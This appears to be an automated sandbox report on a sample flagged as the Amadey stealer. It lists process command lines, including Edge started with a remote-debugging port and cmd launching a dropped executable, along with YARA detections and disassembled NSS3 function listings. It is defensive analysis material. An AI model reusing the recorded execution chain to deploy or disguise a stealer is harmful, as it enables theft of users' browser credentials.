Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:09:31
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	01:09:36
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Imagebase:	0x7ff6f2da0000
File size:	1'255'976 bytes
MD5 hash:	F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:09:36
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6928 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Imagebase:	0x7ff6f2da0000
File size:	1'255'976 bytes
MD5 hash:	F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:09:36
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5292 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:09:36
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3404 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:09:59
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAFHCGIJE.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:09:59
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:09:59
Start date:	23/11/2024
Path:	C:\Users\user\DocumentsJDAFHCGIJE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsJDAFHCGIJE.exe"
Imagebase:	0xb10000
File size:	1'931'776 bytes
MD5 hash:	7E87644426BB54D86265DD3C83727973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000003.2652499898.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.2692770432.0000000000B11000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:10:02
Start date:	23/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x3f0000
File size:	1'931'776 bytes
MD5 hash:	7E87644426BB54D86265DD3C83727973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000003.2691326542.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.2731767525.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:10:31
Start date:	23/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7144 --field-trial-handle=2020,i,2045517477952221284,3671378803524219362,262144 /prefetch:8
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	01:11:00
Start date:	23/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x3f0000
File size:	1'931'776 bytes
MD5 hash:	7E87644426BB54D86265DD3C83727973
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.3386405768.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000003.3258434469.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 6CA86E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CBD2120,6CA87E60), ref: 6CA86EBC
TlsGetValue.KERNEL32 ref: 6CA86EDF
EnterCriticalSection.KERNEL32(?), ref: 6CA86EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6CA86F25

Part of subcall function 6CA5A900: TlsGetValue.KERNEL32(00000000,?,6CBD14E4,?,6C9F4DD9), ref: 6CA5A90F
Part of subcall function 6CA5A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA5A94F

PR_Unlock.NSS3 ref: 6CA86F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6CA86FA9
TlsGetValue.KERNEL32 ref: 6CA870B4
EnterCriticalSection.KERNEL32(?), ref: 6CA870C8
PR_CallOnce.NSS3(6CBD24C0,6CAC7590), ref: 6CA87104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA87117
SECOID_Init.NSS3 ref: 6CA87128
PORT_Alloc_Util.NSS3(00000057), ref: 6CA8714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA8717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA871A9
PR_NotifyAllCondVar.NSS3 ref: 6CA871CF
PR_Unlock.NSS3 ref: 6CA871DD
free.MOZGLUE(?), ref: 6CA871EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA87208
free.MOZGLUE(00000000), ref: 6CA87221
free.MOZGLUE(00000001), ref: 6CA87235
TlsGetValue.KERNEL32 ref: 6CA8724A
EnterCriticalSection.KERNEL32(?), ref: 6CA8725E
PR_NotifyCondVar.NSS3 ref: 6CA87273
PR_Unlock.NSS3 ref: 6CA87281
SECMOD_DestroyModule.NSS3(00000000), ref: 6CA87291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA872B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA872D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA872E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA87372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CBC0148,,defaultModDB,internalKeySlot), ref: 6CA874CC
free.MOZGLUE(00000000), ref: 6CA87513
free.MOZGLUE(00000000), ref: 6CA8751B
free.MOZGLUE(00000000), ref: 6CA87528
free.MOZGLUE(00000000), ref: 6CA8753C
free.MOZGLUE(00000000), ref: 6CA87550
free.MOZGLUE(00000000), ref: 6CA87561
free.MOZGLUE(00000000), ref: 6CA87572
free.MOZGLUE(00000000), ref: 6CA87583
free.MOZGLUE(00000000), ref: 6CA87594
free.MOZGLUE(00000000), ref: 6CA875A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CA875BD
free.MOZGLUE(00000000), ref: 6CA875C8
free.MOZGLUE(00000000), ref: 6CA875F1
PR_NewLock.NSS3 ref: 6CA87636
SECMOD_DestroyModule.NSS3(00000000), ref: 6CA87686
PR_NewLock.NSS3 ref: 6CA876A2

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6CA876B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CA87707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CA8771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CA87731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CA8774A
DeleteCriticalSection.KERNEL32(?), ref: 6CA87770
free.MOZGLUE(?), ref: 6CA87779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA8779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA877AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6CA877C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA877DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6CA87821
PORT_Alloc_Util.NSS3(?), ref: 6CA87837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CA8785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA8786F
SECMOD_AddNewModuleEx.NSS3 ref: 6CA878AC
free.MOZGLUE(00000000), ref: 6CA878BE
SECMOD_AddNewModuleEx.NSS3 ref: 6CA878F3
free.MOZGLUE(00000000), ref: 6CA878FC
free.MOZGLUE(00000000), ref: 6CA8791C

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

Strings

rdb:, xrefs: 6CA87744
dbm:, xrefs: 6CA87716
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CA874C7
sql:, xrefs: 6CA876FE
extern:, xrefs: 6CA8772B
Spac, xrefs: 6CA87389
dll, xrefs: 6CA8788E
kbi., xrefs: 6CA87886
NSS Internal Module, xrefs: 6CA874A2, 6CA874C6
,defaultModDB,internalKeySlot, xrefs: 6CA8748D, 6CA874AA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: ce8c119768afd0078b6d54714cb4263b69c34bf0dac6ef6562da3a804b10edb6
Instruction ID: e907a6620b7701b39b3b8370a27ea585c3378428318510008d5557da2694c74a
Opcode Fuzzy Hash: ce8c119768afd0078b6d54714cb4263b69c34bf0dac6ef6562da3a804b10edb6
Instruction Fuzzy Hash: CA52E3B1E022459BEF119F64CD097AE7BB4AF15308F184028FD19E7B51E731E998CB92

Function 6CAD4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6CAB601B,?,00000000,?), ref: 6CAD486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6CAD48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6CAD48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6CAD48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6CAD48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6CAD490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6CAD4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6CAD493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD4970
PORT_Alloc_Util.NSS3(00000001), ref: 6CAD49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CAD49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6CAD49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6CAD4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6CAD4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6CAD4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6CAD4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6CAD4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6CAD4A81
free.MOZGLUE(00000000), ref: 6CAD4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CAD4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6CAD4ADC
free.MOZGLUE(00000000), ref: 6CAD4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6CAD4B33

Part of subcall function 6CAD4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD413D
Part of subcall function 6CAD4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD4162
Part of subcall function 6CAD4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD416B
Part of subcall function 6CAD4120: PL_strncasecmp.NSS3(6CAD4232,?,00000001), ref: 6CAD4187
Part of subcall function 6CAD4120: NSSUTIL_ArgSkipParameter.NSS3(6CAD4232), ref: 6CAD41A0
Part of subcall function 6CAD4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD41B4
Part of subcall function 6CAD4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6CAD41CC
Part of subcall function 6CAD4120: NSSUTIL_ArgFetchValue.NSS3(6CAD4232,?), ref: 6CAD4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6CAD4B53
free.MOZGLUE(00000000), ref: 6CAD4B94
free.MOZGLUE(?), ref: 6CAD4BA7
free.MOZGLUE(00000000), ref: 6CAD4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD4BC8

Strings

slotFlags, xrefs: 6CAD4A22
rootFlags, xrefs: 6CAD4AB9, 6CAD4B2E
hasRootTrust, xrefs: 6CAD4B4D
hasRootCerts, xrefs: 6CAD4AD6
every, xrefs: 6CAD4A66
timeout, xrefs: 6CAD4A38, 6CAD4A7B
askpw, xrefs: 6CAD4A4A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: bfea1318b8044f8bd0db855a3fe9fe2a0b8ced4ca6170628dca3a69b302a734d
Instruction ID: 4eb15435023f336deb55277746c66efc0751b931536367ca2b4cff302ec1f734
Opcode Fuzzy Hash: bfea1318b8044f8bd0db855a3fe9fe2a0b8ced4ca6170628dca3a69b302a734d
Instruction Fuzzy Hash: 92C12874E053959FEB00CFA99C447EE7BB8AF16248F1A0025EC95A7B01E731F994C7A1

Function 6CA96D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6CB9A8EC,0000006C), ref: 6CA96DC6
memcpy.VCRUNTIME140(?,6CB9A958,0000006C), ref: 6CA96DDB
memcpy.VCRUNTIME140(?,6CB9A9C4,00000078), ref: 6CA96DF1
memcpy.VCRUNTIME140(?,6CB9AA3C,0000006C), ref: 6CA96E06
memcpy.VCRUNTIME140(?,6CB9AAA8,00000060), ref: 6CA96E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA96E38

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6CA96E76
TlsGetValue.KERNEL32 ref: 6CA9726F
EnterCriticalSection.KERNEL32(?), ref: 6CA97283

Strings

!, xrefs: 6CA97123

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: 9818b8c1f6ba6c7942d05204ab606598e4f319905e55614135d3ff7c98512a69
Instruction ID: 61d5c5277ee07dbaa59e2460ad84f18959e6b28a7bd44e172cda8d83db7812ed
Opcode Fuzzy Hash: 9818b8c1f6ba6c7942d05204ab606598e4f319905e55614135d3ff7c98512a69
Instruction Fuzzy Hash: 33726C75E052189FDF609F28CC89B9ABBF5AF49304F1441A9D80DA7711EB31AAC4CF91

Function 6CA03C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA03C66
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6CA03D04
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA03EAD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA03ED7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA03F74
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA04052
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA0406F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6CA0410D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA0449C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA04452, 6CA04486, 6CA044EA, 6CA04571, 6CA04580, 6CA0458F, 6CA0475A, 6CA047FA
%s at line %d of [%.10s], xrefs: 6CA04495, 6CA044F9, 6CA0459E, 6CA04769, 6CA04809
database corruption, xrefs: 6CA04490, 6CA044F4, 6CA04599, 6CA04764, 6CA04804

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2597148001-598938438
Opcode ID: 9b09a69b86414e0d9b76d4d041d439b6be72c98c988c92b9178cfcaa2ffb8399
Instruction ID: 10798fc8e29045e705fb4b41c0c0f5581ebcd25d19d8196823a53d00d3625ce7
Opcode Fuzzy Hash: 9b09a69b86414e0d9b76d4d041d439b6be72c98c988c92b9178cfcaa2ffb8399
Instruction Fuzzy Hash: 25829B74B002149FCB04CF69E490B9EB7B2BF5935CF2981A8D905ABB51D731EC86CB91

Function 6CADAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CADACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CADACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CADACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CADAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CADADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADADF0

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CADB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CADB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CADB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6CADB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CADB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADB40C

Memory Dump Source

